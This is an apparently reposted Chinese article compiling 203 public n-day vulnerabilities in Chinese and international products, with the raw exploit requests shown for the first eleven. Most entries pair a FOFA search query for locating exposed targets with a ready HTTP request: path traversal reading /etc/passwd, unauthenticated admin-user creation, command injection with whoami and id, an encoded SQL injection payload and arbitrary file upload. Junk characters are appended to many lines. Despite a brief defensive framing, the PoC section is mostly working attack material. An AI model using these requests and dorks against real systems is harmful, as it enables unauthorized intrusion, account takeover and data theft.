互联网公开漏洞整理202309-202406
^+ N- s6 U9 x3 o4 |9 j) r2 W8 I/ h道一安全 2024-06-05 07:41 北京* r1 g' o4 m( y
以下文章来源于网络安全新视界 ,作者网络安全新视界
; d, b: X5 d$ ~8 X# s
- m# Q4 s1 R) d6 ^发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
6 o% U3 B \' Y6 W0 R. _
* d0 O1 \0 O- |' Q漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。' r; w( S% `; Y
' j2 P: B% t0 q P4 N+ I安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。; H: b" @1 X$ z& O) P+ ~* v! t, \
4 l B! _/ e+ y% j3 v1 t5 h
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。9 d9 F! p* J% W3 S6 g+ ~5 Y3 K
/ n" U9 J/ M7 e& F" O5 F
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。$ |! [, u( ]& t& R. j& v
! D% k4 V9 S; l2 x; F
, L' H+ D' Q4 G+ G3 T/ J声明
: A. c7 y/ G1 a# ^' i+ Z9 o7 ]- s) P
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。8 n7 C6 t* Z0 q
: F$ g9 P& ]2 G1 y, Y
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
# c5 w! I# G) e8 q/ D
5 A' ^- B0 d/ C
' j1 h( I% S E) N/ }. Q) K/ K, K) Y" r6 Q' l; y. T# ^+ l
目录; F# M1 [6 g' `2 W* N' ?7 u/ w8 w
* X; ^4 }/ w9 f; T
01
" [3 I' N# G3 m: V. ^& E8 S- A; S2 }. |$ @
1. StarRocks MPP数据库未授权访问
7 `1 R$ U% u) @0 B" H1 |2. Casdoor系统static任意文件读取
) e+ q% p* @/ X" W4 _3. EasyCVR智能边缘网关 userlist 信息泄漏 p: |% E1 v8 K
4. EasyCVR视频管理平台存在任意用户添加
: I* ?( _& W+ r$ C5 x3 [0 w5. NUUO NVR 视频存储管理设备远程命令执行
4 {1 p5 a' j& Y; \7 j6. 深信服 NGAF 任意文件读取
( M' p! b* Z2 q @% Y7 j3 {( [& ~( I7. 鸿运主动安全监控云平台任意文件下载
6 Q/ x& E$ }7 o8 F, J8. 斐讯 Phicomm 路由器RCE( G2 n6 l) O, O+ d$ n
9. 稻壳CMS keyword 未授权SQL注入 e2 j0 s* @! e( h! c1 V4 w% p
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传- R- X; f8 d N+ ^1 |* |
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入1 d6 F" r9 m% n" y" n
12. Jorani < 1.0.2 远程命令执行
7 m/ O4 Z3 P( x13. 红帆iOffice ioFileDown任意文件读取' }; F" k& W( M9 V
14. 华夏ERP(jshERP)敏感信息泄露
/ _. O% k* i6 S! v7 @ \' u z- j: E15. 华夏ERP getAllList信息泄露
0 {/ g1 G& Z& h2 M# @5 X* X16. 红帆HFOffice医微云SQL注入: ~, D7 v% p: ]5 L4 Q: C8 c
17. 大华 DSS itcBulletin SQL 注入$ E7 r* ~8 V3 }- e; C2 ~% H5 g
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 |$ u( Y' X: l A. Q
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
2 R6 R; j, T+ C/ B- o; y: t20. 大华ICC智能物联综合管理平台任意文件读取
& K/ k# d2 y7 }" Z3 K21. 大华ICC智能物联综合管理平台random远程代码执行
8 k# R* H: G; A0 G* U; |2 f22. 大华ICC智能物联综合管理平台 log4j远程代码执行% m4 X$ W0 X* |' X4 J
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行4 W0 c' y: [: q. l. @ H3 Z
24. 用友NC 6.5 accept.jsp任意文件上传( i8 [8 W7 j; i* e" o
25. 用友NC registerServlet JNDI 远程代码执行1 d9 e& ]6 K& R- J
26. 用友NC linkVoucher SQL注入
. a* R7 w) N! m, Z( }5 H, Y27. 用友 NC showcontent SQL注入( [/ h/ s( W1 _
28. 用友NC grouptemplet 任意文件上传
' C' n8 s& Q8 e$ x6 X29. 用友NC down/bill SQL注入
Y' T' `* u9 ?) a( T( @30. 用友NC importPml SQL注入
* b- ?+ d( O& p0 ^31. 用友NC runStateServlet SQL注入8 d- |: q, P/ i J9 Y# z X
32. 用友NC complainbilldetail SQL注入- S' h* V2 _6 \& d
33. 用友NC downTax/download SQL注入
# V' w& _% E% t8 x* K: p [34. 用友NC warningDetailInfo接口SQL注入+ K; Y8 a/ H+ N0 D( n& e8 d
35. 用友NC-Cloud importhttpscer任意文件上传
/ O+ f- R9 G2 S8 S# u' }36. 用友NC-Cloud soapFormat XXE1 o0 D# Z) i$ ]
37. 用友NC-Cloud IUpdateService XXE, W- R) z; \" I6 G7 X* u2 X
38. 用友U8 Cloud smartweb2.RPC.d XXE; ~+ U* \$ o9 W# r* D
39. 用友U8 Cloud RegisterServlet SQL注入1 x: v" d( K* y0 `& o
40. 用友U8-Cloud XChangeServlet XXE
; i0 ^% x( w: \. S8 Y! e41. 用友U8 Cloud MeasureQueryByToolAction SQL注入# y) Z# Q3 O6 t
42. 用友GRP-U8 SmartUpload01 文件上传
" g$ r) C1 l/ p0 A$ X43. 用友GRP-U8 userInfoWeb SQL注入致RCE
9 f7 F& c9 m) L5 \ W- s44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ d' }* c# H# x# r9 ]- u45. 用友GRP-U8 ufgovbank XXE
& L' ~/ G7 b# U. b46. 用友GRP-U8 sqcxIndex.jsp SQL注入: t K5 k8 \3 w% J$ w
47. 用友GRP A++Cloud 政府财务云 任意文件读取
, n) K3 \# R( _. Z7 D* C48. 用友U8 CRM swfupload 任意文件上传
* n- } T e& o% q49. 用友U8 CRM系统uploadfile.php接口任意文件上传
( J/ Y5 m! B+ F, z$ W50. QDocs Smart School 6.4.1 filterRecords SQL注入& x9 o3 h5 Z0 R2 m
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
5 q$ G& R: t# C: p6 G5 v52. 泛微E-Office json_common.php sql注入
$ a; O8 p7 H) z2 w/ x) } n53. 迪普 DPTech VPN Service 任意文件上传$ D1 t/ }7 y! f- ^# R
54. 畅捷通T+ getstorewarehousebystore 远程代码执行) v) s; F1 I3 m$ P/ h6 D
55. 畅捷通T+ getdecallusers信息泄露- [2 b/ m3 r& O P' f# \
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# h9 H t; A, S& h2 p
57. 畅捷通T+ keyEdit.aspx SQL注入
0 l k% ~- h% D; a2 U58. 畅捷通T+ KeyInfoList.aspx sql注入; V& B) L) T) b) e8 g- v1 {
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 Q! |7 m1 M' y& ~* c4 @: b& `
60. 百卓Smart管理平台 importexport.php SQL注入
o/ ^, Z! }& N61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& N# j4 V! {( g( C62. IP-guard WebServer 远程命令执行
4 P$ V9 W5 m) i63. IP-guard WebServer任意文件读取+ Z( W; a0 |+ X0 g+ f9 K) g# A
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 k# d' I2 o4 X# S+ d q$ p' m65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过/ n. s5 L! J& }: C( G* Q* E! N
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
4 S0 A- g. @, M- D2 Z# M67. 万户ezOFFICE wpsservlet任意文件上传$ N3 t; d& W3 Z! p8 F
68. 万户ezOFFICE wf_printnum.jsp SQL注入% {2 J9 O+ d" c0 Z! B9 b
69. 万户 ezOFFICE contract_gd.jsp SQL注入
# }5 v/ z8 [* ?: ]0 U70. 万户ezEIP success 命令执行4 }, \+ l0 k% R A
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
8 j# F2 N- ?: Z- P6 D- T% Z4 u72. 致远OA getAjaxDataServlet XXE) j* J @0 `' O2 N8 U' V& {6 X
73. GeoServer wms远程代码执行
: E9 A# [, M2 K: S74. 致远M3-server 6_1sp1 反序列化RCE
; f- {1 _% X* ~3 d& i75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* K. z* K, Z$ Y* R! P! G% m
76. 新开普掌上校园服务管理平台service.action远程命令执行: ^6 F/ ?# d7 H4 q1 C8 C: `/ m
77. F22服装管理软件系统UploadHandler.ashx任意文件上传) ^: S/ N1 o4 ]/ H6 ] }
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传4 \- i% R4 t( u/ s
79. BYTEVALUE 百为流控路由器远程命令执行/ z7 ?* L& p: a0 s7 {, M( m
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传 t: h) }. y& g) g* _
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
# \2 Q% ~0 t* M e! W/ Q7 i82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
9 L% O7 U6 r. [( n; b83. JeecgBoot testConnection 远程命令执行8 M1 q: p( d( }; D6 S1 S1 N
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' L& O- r8 G' ]. Q/ }& e0 O* \1 o# m85. SysAid On-premise< 23.3.36远程代码执行
* q$ g; j1 Q3 u- z86. 日本tosei自助洗衣机RCE
7 U" b0 W& ~* z2 A& z# h e87. 安恒明御安全网关aaa_local_web_preview文件上传8 |$ d, P, \, \6 q% r1 s# v5 X
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
$ m4 Q( ]" b. e& p) [0 V% G89. 致远互联FE协作办公平台editflow_manager存在sql注入
% d2 O, i! x" h) t90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行7 m* G* ~0 T% P# Z! G6 u
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取2 p0 y% ]! z& b) l
92. 海康威视运行管理中心session命令执行
: a w7 z7 ?( L93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 }; g @$ d- _9 Z+ n94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
$ q0 ]: ^9 \* M6 a' [! {2 D, M95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
7 N* X9 Z: V, a& i: o3 y9 w P& s96. Apache OFBiz 18.12.11 groovy 远程代码执行
: ?1 d1 x% C- [6 ]0 ]- R97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行) }$ {( O) G; H: ]3 F
98. SpiderFlow爬虫平台远程命令执行
: e y0 `( K% F99. Ncast盈可视高清智能录播系统busiFacade RCE+ i$ r8 w" ~' w% p4 l- S
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传' G- \3 \9 ~/ C- w- ] H
101. ivanti policy secure-22.6命令注入/ E$ G* _/ Q5 O$ |, y/ u6 M- b8 ~
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行$ I: l, S* _6 w
103. Ivanti Pulse Connect Secure VPN XXE0 O7 W6 p3 N: s; A; o$ X' Q- H# p8 ?
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 Q0 r I7 b8 S J' @, i6 e) W
105. SpringBlade v3.2.0 export-user SQL 注入
% C+ h+ K; f1 t) [$ O7 U3 i, s106. SpringBlade dict-biz/list SQL 注入
, l6 s4 }# n% R! A; p107. SpringBlade tenant/list SQL 注入
7 a! C- h4 @- t3 f9 H108. D-Tale 3.9.0 SSRF. V0 S9 u: Q2 h% Z# a9 o
109. Jenkins CLI 任意文件读取
* f2 y# y& `* }110. Goanywhere MFT 未授权创建管理员8 w7 N7 ` E+ R5 K5 [ p0 [8 V0 s
111. WordPress Plugin HTML5 Video Player SQL注入
" m( A$ Z6 A& v5 E( X% r! H8 N112. WordPress Plugin NotificationX SQL 注入
1 E" V8 \0 y: B0 k" |- Y# _6 w113. WordPress Automatic 插件任意文件下载和SSRF
F' \, g1 u" O114. WordPress MasterStudy LMS插件 SQL注入
- _$ J6 }3 E. w115. WordPress Bricks Builder <= 1.9.6 RCE
% }+ W( J1 ^6 |. c1 _116. wordpress js-support-ticket文件上传
, |0 V9 D6 ^: j5 k+ f117. WordPress LayerSlider插件SQL注入/ A- u7 t \8 g7 B5 v, W N
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传8 u5 n$ c. v$ }3 q# g8 e
119. 北京百绰智能S20后台sysmanageajax.php sql注入
; B4 S; V( d6 u" Z s* P120. 北京百绰智能S40管理平台导入web.php任意文件上传, ~& g2 {+ S. ^6 N1 J
121. 北京百绰智能S42管理平台userattestation.php任意文件上传3 v/ e3 Q7 @# ^6 Y- ?
122. 北京百绰智能s200管理平台/importexport.php sql注入* I$ K& P, u/ q9 I) P: ?! ^
123. Atlassian Confluence 模板注入代码执行
7 c1 ]& Y) k8 \* N. u5 Y$ Z K124. 湖南建研工程质量检测系统任意文件上传( T2 [1 ^- c {) f: |0 ^! W
125. ConnectWise ScreenConnect身份验证绕过3 f9 M" S) z# j9 c0 p8 q- J* A
126. Aiohttp 路径遍历1 q, k- A8 H, [1 l* o
127. 广联达Linkworks DataExchange.ashx XXE* P/ X: i M2 ~; |( ~& v
128. Adobe ColdFusion 反序列化
5 G* a7 `. z1 {, H/ n) V129. Adobe ColdFusion 任意文件读取
/ ?9 w2 i& u! r( V1 Q& j0 N/ u130. Laykefu客服系统任意文件上传
) O I8 h3 I; z4 {131. Mini-Tmall <=20231017 SQL注入
! x7 Z3 P8 m# J2 @) A9 v132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' W& |# F* Q5 J* Z- U0 H
133. H5 云商城 file.php 文件上传
' z% N! e; N& e# g6 l134. 网康NS-ASG应用安全网关index.php sql注入
0 A- Z8 ^! P" }; y6 l) E135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
* k" n! D( |- q8 W; O: B) n; r7 E136. NextChat cors SSRF# Q0 `. f3 j! n
137. 福建科立迅通信指挥调度平台down_file.php sql注入
( c; v- S( G. L% x. U8 V* I) r138. 福建科立讯通信指挥调度平台pwd_update.php sql注入 {6 g7 Q# }' `, ?: r) g9 p
139. 福建科立讯通信指挥调度平台editemedia.php sql注入- |' `! k* _& G2 V) z8 v' P, X
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
X s/ R7 M+ f! J$ \, y141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: V- d: j2 k! L/ J: H3 O! n
142. CMSV6车辆监控平台系统中存在弱密码
( o2 U9 W( S6 s( f) k4 x) k+ u! E143. Netis WF2780 v2.1.40144 远程命令执行
$ p+ G% m9 A- n, O, L9 o144. D-Link nas_sharing.cgi 命令注入
+ {9 ?# \' X% }; E7 I$ ~145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
% D, j+ x& @" n9 e1 b146. MajorDoMo thumb.php 未授权远程代码执行
0 D6 ]+ q9 D1 c1 T9 ^- U) B147. RaidenMAILD邮件服务器v.4.9.4-路径遍历$ B0 z& u# Z' z3 @# W* } `- U
148. CrushFTP 认证绕过模板注入
* S. l# @; r! _# c4 |149. AJ-Report开源数据大屏存在远程命令执行
( q7 b- Y' Q- v' |/ h150. AJ-Report 1.4.0 认证绕过与远程代码执行: i4 W( U) G5 T/ i! V
151. AJ-Report 1.4.1 pageList sql注入
3 J& o" p/ I" _; H1 y; v( s" h152. Progress Kemp LoadMaster 远程命令执行- v" E$ z, Q" j3 L2 n
153. gradio任意文件读取
! ?) _7 O6 t& l154. 天维尔消防救援作战调度平台 SQL注入
" y1 ~3 }; L- l7 j1 k155. 六零导航页 file.php 任意文件上传6 T$ r2 w6 v/ M% \ S$ ?- V2 Y
156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ F% Q( ?9 M, m. q157. 美特CRM upload.jsp 任意文件上传
3 s! e: x* j# k" k158. Mura-CMS-processAsyncObject存在SQL注入2 B, k; B$ H4 f; c0 d
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
% a0 X5 Z" s! u3 d8 Q% j0 T' r3 X5 C160. Sonatype Nexus Repository 3目录遍历与文件读取7 P( a) Y% Z4 @: q- p
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
; b: J3 w V* z( {3 S E8 O162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
* J' J+ V+ E- T' B1 w7 I& c# y163. 号卡极团分销管理系统 ue_serve.php 任意文件上传/ q: Y# b8 B Y [5 I7 v
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传. J. {! x0 b; ]; \ w& Q3 N7 a
165. OrangeHRM 3.3.3 SQL 注入
2 {4 e3 p& d( ~( k+ P* z u166. 中成科信票务管理平台SeatMapHandler SQL注入, ]# G8 b' F0 L# g5 V& e( w
167. 精益价值管理系统 DownLoad.aspx任意文件读取2 W: Q8 Y% S7 S; h+ l) | U
168. 宏景EHR OutputCode 任意文件读取
4 l+ ^2 O/ A' k169. 宏景EHR downlawbase SQL注入6 E9 T% Y- X7 x3 |* l$ Z
170. 宏景EHR DisplayExcelCustomReport 任意文件读取" |/ U2 D* r5 I5 l) |* v0 k
171. 通天星CMSV6车载定位监控平台 SQL注入: ^, x. w4 ~& g* ?3 ^# {1 v
172. DT-高清车牌识别摄像机任意文件读取
7 S1 k0 e b0 [! l" C7 Z% @173. Check Point 安全网关任意文件读取
3 o* ?) p' L. T174. 金和OA C6 FileDownLoad.aspx 任意文件读取5 S/ {5 P( u* d. Q, c1 ]1 u
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
7 W" H$ [( |" Q, H' q- D176. 电信网关配置管理系统 rewrite.php 文件上传7 _9 e# ^! b) y0 j7 I, F- w
177. H3C路由器敏感信息泄露
) [$ R& p& c( o178. H3C校园网自助服务系统-flexfileupload-任意文件上传
: |' A+ ^1 X$ f- G3 i8 u/ }4 v179. 建文工程管理系统存在任意文件读取1 t# r3 m6 R1 Y: q8 ?9 K B0 g6 ~
180. 帮管客 CRM jiliyu SQL注入
8 E2 Z$ i. A1 P6 l( \% P$ o2 K, G181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入* Y3 S) b% [2 }6 P& ?! Z {
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建4 `4 |, o! h. d7 h5 [2 V) l2 `
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. j+ y- D. R; s0 b- d184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加 ? h( u$ R/ f2 g' ^1 T* @
185. 瑞友天翼应用虚拟化系统SQL注入* ]& q* c5 O- O) m! z
186. F-logic DataCube3 SQL注入
5 H) L q: t C187. Mura CMS processAsyncObject SQL注入
8 [& U0 Q5 H4 U: N, L% L188. 叁体-佳会视频会议 attachment 任意文件读取
, A3 s) n! N3 p189. 蓝网科技临床浏览系统 deleteStudy SQL注入
5 J4 B6 P2 n5 N: h8 q190. 短视频矩阵营销系统 poihuoqu 任意文件读取
H9 k) g8 M6 s8 X: A5 F3 W. s9 d7 k191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
/ ]& m6 e8 a# m" P4 `4 O. J( q192. 富通天下外贸ERP UploadEmailAttr 任意文件上传7 B9 ~& \5 [9 x# d% |4 {
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
6 Z1 B/ a* t- L, V0 r194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传8 \- k& y* L! Z4 ^
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 C- w2 b) P8 o" r% e( Q
196. 河南省风速科技统一认证平台密码重置
1 e$ ~; ?3 E) o2 b197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
7 U6 z+ ~+ B J( O/ @* Y198. 阿里云盘 WebDAV 命令注入2 d* X% ~8 R3 X; \% |& i/ `' `
199. cockpit系统assetsmanager_upload接口 文件上传6 @" U$ m. F, I4 i- B) S
200. SeaCMS海洋影视管理系统dmku SQL注入, j4 S o0 g+ m9 Z
201. 方正全媒体新闻采编系统 binary SQL注入4 @; @: q8 \* T
202. 微擎系统 AccountEdit任意文件上传 e5 a: Y8 f& Q/ g0 T& {8 p% O
203. 红海云EHR PtFjk 文件上传2 d& s. t, `! [, f- d2 _
- B) i7 ?) y% F7 O5 Q
POC列表
& e+ F5 Y# Y+ Y0 I1 [! _" J" Y W
/ O* v( Y8 y5 M0 n9 \; S ^8 M02: o+ }+ r, e9 q. r k& O/ E
8 L* @' E+ b, m5 d. b( r1. StarRocks MPP数据库未授权访问
6 R5 x4 O* |) mFOFA :title="StarRocks"3 X6 n" G3 W% p2 h, j
GET /mem_tracker HTTP/1.1& _$ k- T2 o3 o5 N8 o
Host: URL3 ~ h: c, S s- C
7 v3 T* J: ~2 _ @( o4 P
9 O6 J1 u+ @6 h4 M5 G/ f2. Casdoor系统static任意文件读取0 k1 B8 a3 q" M8 E
FOFA :title="Casdoor"7 A0 w: P" e5 n, k9 g2 T9 k
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
1 A6 c0 }# l' o* M8 b( GHost: xx.xx.xx.xx:9999 X e' m6 R i! _% B4 X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ d' h- A8 k6 m% w" J7 D: X$ J) _
Connection: close
5 C, h1 f0 I" wAccept: */*: D: s+ j; z. B `
Accept-Language: en
. i4 l. B: L8 u- j6 V0 v" vAccept-Encoding: gzip7 P* N3 `/ L( z8 j
Z' k: z# Q5 m7 k r& E7 n
7 z H: ]- [4 K( D- O1 c
3. EasyCVR智能边缘网关 userlist 信息泄漏
# b2 e) ?$ I* f: r6 u% I# _6 }FOFA :title="EasyCVR"
1 c8 P* O6 \8 L( ]7 l; }1 qGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
( b7 Z0 j. V9 g. z; l2 C. wHost: xx.xx.xx.xx
4 l& j$ x; l2 x
/ f- z& c- T Z4 x4 g! k! ^
( U' W) F- y w& A4. EasyCVR视频管理平台存在任意用户添加
- y+ O. p5 Q2 u! }FOFA :title="EasyCVR" n" U2 T6 U: w5 T2 F
3 l9 }- N4 s0 t
password更改为自己的密码md5
# w K% p2 i; `% tPOST /api/v1/adduser HTTP/1.17 [0 |& c6 c/ i
Host: your-ip
1 a+ |" b$ p& \) eContent-Type: application/x-www-form-urlencoded; charset=UTF-8
( I7 ~8 r) U+ p: }+ h* m8 e- J0 Y3 ~" [' l' A9 ^
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=18 E; u# L6 b9 U0 R- e" z$ t- z
# K& w0 ]4 A4 |$ N5 k* d, R6 V
$ R1 M4 y. N) J0 D6 N+ N1 l4 C: ?, [5. NUUO NVR 视频存储管理设备远程命令执行
& K$ l L0 O+ X+ q7 j7 JFOFA:title="Network Video Recorder Login"
: b6 D# T5 A: ?' iGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 t" Y* p* z7 y: I! e+ Q( YHost: xx.xx.xx.xx
2 b7 r P" s2 C6 q1 }6 s6 I, h# B+ B0 e% n- W, h3 U3 L; ]
" L7 ?- X s4 d( H3 R* o! Y
6. 深信服 NGAF 任意文件读取4 |2 B# ], `& N& R6 s" }$ V3 w
FOFA:title="SANGFOR | NGAF"
" I$ z. T2 Q" K: HGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
- S2 }8 h5 M1 ]+ W1 gHost:
3 p* A) V" {0 y: g/ r$ ^" ~: J+ ?% {7 v" L3 H" d7 J' {
+ G1 b# S8 C/ q" u/ B6 I$ j7. 鸿运主动安全监控云平台任意文件下载
3 C. c3 l8 H- o# DFOFA:body="./open/webApi.html"' \* i; z6 u% g: [3 p+ Y
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1 U" g5 ^4 A9 o% R' B8 y: a
Host:( g) q9 U+ i+ R7 f
# X; M: g( L' l8 U
2 |. [& Y6 T, B# c! u+ ~8. 斐讯 Phicomm 路由器RCE9 K% f, h$ N( y! {% o
FOFA:icon_hash="-1344736688" S% Z. {0 p" m+ ?! f5 M
默认账号admin登录后台后,执行操作
& p M8 O2 \% c H. B- C* mPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ l6 m% x# ]# L! I z. D9 D2 B/ yHost: x.x.x.x
: \, C- K* {+ l5 f+ BCookie: sysauth=第一步登录获取的cookie R7 H# ~1 N, x) a; i( `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
( R6 f, m/ A6 ^* p) W, a" K8 j( lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" j$ y& g# S0 z8 r4 z; C
3 O2 u3 \- a8 r2 l. N. Z" ?
------WebKitFormBoundaryxbgjoytz4 `) A% c1 I& R+ X9 X3 [* l
Content-Disposition: form-data; name="wifiRebootEnablestatus"
) V# {( h# ^8 `) A, G2 W/ g& l. ~, H
%s
9 N. N2 e6 t3 c( D1 {& u7 w! b------WebKitFormBoundaryxbgjoytz# w' D/ Y' p9 `4 {& {6 K
Content-Disposition: form-data; name="wifiRebootrange"
8 E- N4 z4 d4 U5 G4 a1 V7 s- M8 k$ o. j/ X- E/ `7 c
12:00; id;
6 d& Y0 |* Z0 R; \( Q7 r------WebKitFormBoundaryxbgjoytz
2 H4 Z0 i* { ?4 }( p3 {Content-Disposition: form-data; name="wifiRebootendrange"
, U( U6 U3 \, `- A- I" i% Y; O, T6 a: |/ f; i9 @8 q& b& y% W' s2 T2 _3 @
%s:) J! L# b0 x6 d0 }
------WebKitFormBoundaryxbgjoytz
# E# X+ n4 {3 O* [( I+ ^9 y* GContent-Disposition: form-data; name="cururl2"! f+ R4 a( O- q
9 ]0 g9 W- x$ J" f1 L: ], l0 i4 n( w* H2 M" X, Q9 [
------WebKitFormBoundaryxbgjoytz--
/ z- k- [+ W$ ?+ s& m( c8 S4 g! J' |$ M5 |+ R1 S1 ^2 |' l
1 k, E* b8 M; l) q9. 稻壳CMS keyword 未授权SQL注入; J' P' |% l: e# z z! v- P
FOFA:app="Doccms"# l5 F( l) k8 D4 Y
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1( S- K' [" o1 F' x: c, ?: T) @
Host: x.x.x.x/ g7 m0 `* U) S- r- \
6 Q- m0 _1 j- V7 N
* U4 P' j7 c, A2 p, C) } c2 u
payload为下列语句的二次Url编码
7 y ?5 _ O: u' @5 W" z9 ^; P+ M% b
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#+ x! k% K) a2 y) E7 A, r1 P
5 G' A1 | V) _9 k
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
& e( ]8 V3 }3 i5 y7 [FOFA:icon_hash="953405444"
$ J' F" s$ p3 S' W" |
; C1 @5 Z { L9 B* A文件上传后响应中包含上传文件的路径- N5 N3 }1 R' w; F2 F
POST /eis/service/api.aspx?action=saveImg HTTP/1.1- P* V _ j: \) v
Host: x.x.x.x:xx2 X2 w9 g2 l6 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
8 R. l* S1 L: Y- @, j. @Content-Length: 197
2 y7 k- c) ]/ y2 U2 `! m2 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& Z# J9 B0 g7 Y2 E. Q& h$ k! m( x
Accept-Encoding: gzip, deflate& F& G" R3 ?/ ]2 [" W' i' h
Accept-Language: zh-CN,zh;q=0.9
2 G$ y: q$ y; S) q- a# V# {Connection: close Q* ^7 p, M/ ~8 S3 B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
7 _5 s7 l; D9 {! Z; F
/ H/ ^5 ~$ r" \- y------WebKitFormBoundaryxdgaqmqu$ N3 _! O+ O* ?+ b5 _. X1 M
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
- k3 Z: @& A9 J$ h IContent-Type: text/html
6 g2 \7 r4 V0 I) C# e
) V* G% B# W& y/ u6 P. @jmnqjfdsupxgfidopeixbgsxbf
- Q1 V) m1 S; j# F3 q; g. Z------WebKitFormBoundaryxdgaqmqu--
/ Q1 Z1 U' k$ Y- W f3 H0 ^$ P" n. E0 b, B3 U
7 p+ w; M) w8 m1 s, h4 l4 L
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
9 [* U! y$ N f2 qFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
